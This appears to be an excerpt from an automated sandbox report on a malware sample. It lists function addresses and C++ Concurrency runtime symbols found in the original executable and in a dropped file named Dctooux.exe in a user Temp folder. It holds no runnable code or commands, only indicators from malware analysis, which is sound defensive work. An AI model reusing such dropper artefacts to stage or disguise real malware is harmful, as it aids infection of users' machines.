Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F714C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_02F714C8
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 20_2_00431261
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 20_2_00431F58
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F221BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 20_2_02F221BF
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F214C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 20_2_02F214C8
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00402340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 28_2_00402340
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 28_2_00431261
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 28_2_00431F58
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048F14C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 28_2_048F14C8
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048F21BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 28_2_048F21BF